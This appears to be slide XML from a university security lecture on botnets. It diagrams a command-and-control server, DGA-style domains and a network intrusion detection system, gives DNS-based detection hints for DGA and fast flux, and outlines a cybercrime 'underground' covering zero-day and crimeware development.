                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B34F65B5-41C1-403E-966E-0D76A6615B7A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2420200" y="4074410"/>
              <a:ext cx="1396127" cy="830997"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" sz="2400" dirty="0"/>
                <a:t>C&amp;C Server</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="9" name="Picture 3" descr="D:\Classes\CS 4700\assets\server.png">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{077C41C4-C9DE-46F6-9C36-CC4E3E1B9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530" y="3951992"/>
              <a:ext cx="1075834" cy="10758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Classes\CS 4700\assets\devil-icon.png">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8DBDB0E8-D0F7-41ED-8D64-90387CB88D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1980" y="4250616"/>
              <a:ext cx="830997" cy="83099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Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F180E1DE-52C3-42B4-98C1-38F74C746569}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="503206" y="4416192"/>
            <a:ext cx="10990730" cy="2216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DGA: many failed DNS lookups</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>For fast flux: multiple DNS lookups for one name, response has short TTL</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>10 seconds – 10 minutes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Most DNS names have TTL of hours or days</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="TextBox 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{682F9A42-886B-4603-A5BF-2F25DA6BDD51}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8271526" y="1515610"/>
            <a:ext cx="1396127" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>uT4z.com</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="TextBox 22">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{77D8FE6B-1F6E-4CD5-9533-8A2CE99661D0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8271524" y="2613430"/>
            <a:ext cx="1505981" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>5gPX.com</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="TextBox 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3524AFEE-F314-4FEE-8E40-D8695D4E61D0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8271524" y="3464946"/>
            <a:ext cx="1505981" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>9d2W.com</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="14" name="Connector: Elbow 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B665D411-4E78-45F7-9C2B-901FF99DED67}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="10" idx="0"/>
            <a:endCxn id="22" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="6702441" y="1746443"/>
            <a:ext cx="1569085" cy="1097329"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">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1F7E3B88-289E-4438-9E68-29AF9FD3ABFF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="10" idx="0"/>
            <a:endCxn id="26" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6702441" y="2843772"/>
            <a:ext cx="1569083" cy="852007"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">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AF3BA67-4BC5-47AE-BB66-DA3A30A3B5B9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="23" idx="1"/>
            <a:endCxn id="10" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="6702441" y="2843772"/>
            <a:ext cx="1569083" cy="491"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="57150"/>
        </p:spPr>
        <p:style>
          <a:lnRef idx="3">
            <a:schemeClr val="accent3"/>
          </a:lnRef>
          <a:fillRef idx="0">
            <a:schemeClr val="accent3"/>
          </a:fillRef>
          <a:effectRef idx="2">
            <a:schemeClr val="accent3"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="tx1"/>
          </a:fontRef>
        </p:style>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="35" name="Multiplication Sign 34">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0399C552-5A2A-4615-828C-0422B9973AF9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9607082" y="2426826"/>
            <a:ext cx="952137" cy="952137"/>
          </a:xfrm>
          <a:prstGeom prst="mathMultiply">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Multiplication Sign 35">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{86F23F71-CC98-4069-88AB-8A54A033F266}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9606983" y="3318430"/>
            <a:ext cx="952137" cy="952137"/>
          </a:xfrm>
          <a:prstGeom prst="mathMultiply">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9" name="Connector: Curved 38">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{92B630EA-0265-4708-BB25-4FABE99F97FA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1243106" y="2821485"/>
            <a:ext cx="6974541" cy="702715"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 84190"/>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41" name="Connector: Curved 40">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2F0D7F3F-5B44-4284-8320-0E830929056F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:endCxn id="23" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1243007" y="2821485"/>
            <a:ext cx="7028517" cy="22778"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>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44" name="Connector: Curved 43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1672B8F4-63D9-4E47-A5E9-FA02A9EF891D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:endCxn id="22" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="1243007" y="1746443"/>
            <a:ext cx="7028519" cy="1074552"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 74999"/>
            </a:avLst>
          </a:prstGeom>
          <a:ln w="76200">
            <a:tailEnd type="triangle"/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="3">
            <a:schemeClr val="accent2"/>
          </a:lnRef>
          <a:fillRef idx="0">
            <a:schemeClr val="accent2"/>
          </a:fillRef>
          <a:effectRef idx="2">
            <a:schemeClr val="accent2"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="tx1"/>
          </a:fontRef>
        </p:style>
      </p:cxnSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="18" name="Group 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F84D0ACC-1293-4B31-98D3-C20B54DDDA45}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2851785" y="1746443"/>
            <a:ext cx="1396127" cy="1732994"/>
            <a:chOff x="5775638" y="3240561"/>
            <a:chExt cx="1396127" cy="1732994"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="6" name="Picture 5">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D715D0F0-849C-4ED0-BB56-8B7FF83A5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3226" y="3702226"/>
              <a:ext cx="1328539" cy="1271329"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="17" name="TextBox 16">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3A1AD27D-943E-42EC-B1BA-182BF2A1D02B}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5775638" y="3240561"/>
              <a:ext cx="1396127" cy="461665"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" sz="2400" dirty="0"/>
                <a:t>NIDS</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="11" name="Group 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1B8493EA-461E-40CB-A13D-75107C51AD71}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="150244" y="2336554"/>
            <a:ext cx="1340841" cy="1075833"/>
            <a:chOff x="10673976" y="3951992"/>
            <a:chExt cx="1340841" cy="1075833"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="4" name="Picture 2" descr="C:\Users\t0ph3r\Documents\CS 4700\assets\black_server.png">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A090FBDC-F522-4CAC-8610-04DB3943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8984" y="3951992"/>
              <a:ext cx="1075833" cy="10758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6FBCE55-66FB-463E-9F51-4BEF486246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3976" y="4350974"/>
              <a:ext cx="614399" cy="614399"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="285467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36"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="21" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="499"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="36"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="hidden"/>
                                      </p:to>
                                    </p:se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left)">
                                      <p:cBhvr>
                                        <p:cTn id="25" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="41"/>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left)">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anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="50" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="21"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="5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5" grpId="0" animBg="1"/>
      <p:bldP spid="35" grpId="1" animBg="1"/>
      <p:bldP spid="36" grpId="0" animBg="1"/>
      <p:bldP spid="3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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AA288E99-8C2D-4A88-999A-23A6D9C7AD29}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="7414562" y="632347"/>
            <a:ext cx="3021534" cy="10176"/>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163747" y="162006"/>
            <a:ext cx="10515600" cy="1325563"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Structure of the</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Underground</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="6" name="Content Placeholder 5"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="739750" y="855947"/>
          <a:ext cx="10515600" cy="6101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Arrow Connector 9"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="3251745" y="4966385"/>
            <a:ext cx="0" cy="145411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85766" y="6180655"/>
            <a:ext cx="0" cy="2398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10438616" y="6171647"/>
            <a:ext cx="0" cy="3315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3251745" y="6421980"/>
            <a:ext cx="8325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504609" y="6162431"/>
            <a:ext cx="0" cy="2864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4504609" y="6448927"/>
            <a:ext cx="7106809" cy="677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a:xfrm>
            <a:off x="11611418" y="2126665"/>
            <a:ext cx="0" cy="43900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flipH="1">
            <a:off x="9973735" y="2126665"/>
            <a:ext cx="163768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B3DBC1-5D68-4327-9F7E-9CC4669056DF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4296714" y="6174230"/>
            <a:ext cx="0" cy="49253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FDAFA2-28DA-49EC-B885-3B2BE77B64AC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1505400" y="6668974"/>
            <a:ext cx="27913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DD76233-8748-48BA-A5C0-85B198F15820}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="1505400" y="4966385"/>
            <a:ext cx="0" cy="17085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4787FDB-0F75-4C11-ADD9-9A98A3C531E1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1165979" y="3541057"/>
            <a:ext cx="0" cy="4927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3D054B5-2392-4175-9CD5-CDE7FF4C0A80}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1165979" y="3548530"/>
            <a:ext cx="5996989" cy="465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48BDDD5-F446-438D-9B52-AB2568ADA333}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5621701" y="3595111"/>
            <a:ext cx="0" cy="4386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D0F61A8-1D5D-447A-BBA7-869295DDE43F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7161466" y="3595110"/>
            <a:ext cx="0" cy="4386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D536A7E7-A6E2-4715-8939-342DAD5AB441}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6556798" y="162005"/>
            <a:ext cx="1704394" cy="906180"/>
            <a:chOff x="6214327" y="1292169"/>
            <a:chExt cx="2050412" cy="906180"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="52" name="Rectangle: Rounded Corners 51">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E6739DC6-B36D-489A-BCFA-643DCAEE5EAB}"/>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3908339E-1583-46AF-A390-A94A28E28DB8}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6389104" y="1411965"/>
              <a:ext cx="1875635"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rPr>
                <a:t>Zero-day Development</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="55" name="Group 54">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8F5FD889-3346-4CD8-A038-C5C40C956210}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="9550956" y="162005"/>
            <a:ext cx="1704394" cy="906180"/>
            <a:chOff x="6214327" y="1292169"/>
            <a:chExt cx="2050412" cy="906180"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="56" name="Rectangle: Rounded Corners 55">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C08CBF0C-03A9-4452-A839-415F0248E337}"/>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B269B01C-5C1F-4067-AA5F-8E88FF7F55BF}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6389104" y="1411965"/>
              <a:ext cx="1875635"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err="1">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>Crimeware</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t> Development</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="59" name="Straight Connector 58">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CCA76E5D-33F4-4A5A-B745-17A391F4D76D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="53" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7481636" y="1068185"/>
            <a:ext cx="0" cy="22949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1" name="Straight Connector 60">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0D31171E-46D8-4B36-8CDE-5EB642F4D13A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10503171" y="1068185"/>
            <a:ext cx="0" cy="22949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2" name="Straight Connector 61">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9B801004-FC82-43D0-BBB2-B7EA49575171}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8925329" y="1297681"/>
            <a:ext cx="0" cy="30463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3" name="Straight Connector 62">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E94C6349-1204-483B-BE52-BD95F8D8707B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="7481637" y="1297681"/>
            <a:ext cx="3021534" cy="10176"/>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69" name="Rectangle 68">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{13D6170F-46E2-4F33-B4E8-2772E243B7B2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9364500" y="64451"/>
            <a:ext cx="2171421" cy="1128127"/>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76" name="Group 75">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{40894DD1-ECDF-483A-B62D-198E51C83BC2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3699587" y="1923564"/>
            <a:ext cx="1704394" cy="906180"/>
            <a:chOff x="6214327" y="1292169"/>
            <a:chExt cx="2050411" cy="906180"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
